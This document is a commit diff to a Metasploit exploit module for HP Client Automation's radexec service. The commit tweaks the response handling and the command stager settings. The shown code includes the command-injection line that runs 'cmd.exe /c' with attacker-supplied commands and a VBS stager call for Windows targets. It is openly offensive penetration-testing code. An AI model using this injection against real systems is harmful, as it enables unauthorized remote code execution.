Read response back while staging

jvazquez-r7 · jvazquez-r7 · commit 1633a6d4fd79 · 2015-02-20T01:06:47.000-06:00
diff --git a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
@@ -83,10 +83,10 @@ def check
     sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
     sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
     sock.put("hide\x00") # command
-    data = sock.get_once
+    res = sock.get_once
     disconnect
 
-    if data && data.unpack('C')[0] == 0
+    if res && res.unpack('C')[0] == 0
       return Exploit::CheckCode::Detected
     end
 
@@ -97,7 +97,7 @@ def exploit
     case target['Platform']
     when 'win'
       print_status('Exploiting Windows target...')
-      execute_cmdstager({:flavor => :vbs, :linemax => 290, :delay => 0.75})
+      execute_cmdstager({:flavor => :vbs, :linemax => 290})
     when 'unix'
       print_status('Exploiting Linux target...')
       exploit_unix
@@ -121,6 +121,10 @@ def execute_command(cmd, opts = {})
     sock.put("S-1-5-18\x00") # user ID
     sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
     sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
+    res = sock.get_once
     disconnect
+    unless res && res.unpack('C')[0] == 0
+      fail_with(Failure::Unknown, "Something failed executing the stager...")
+    end
   end
 end
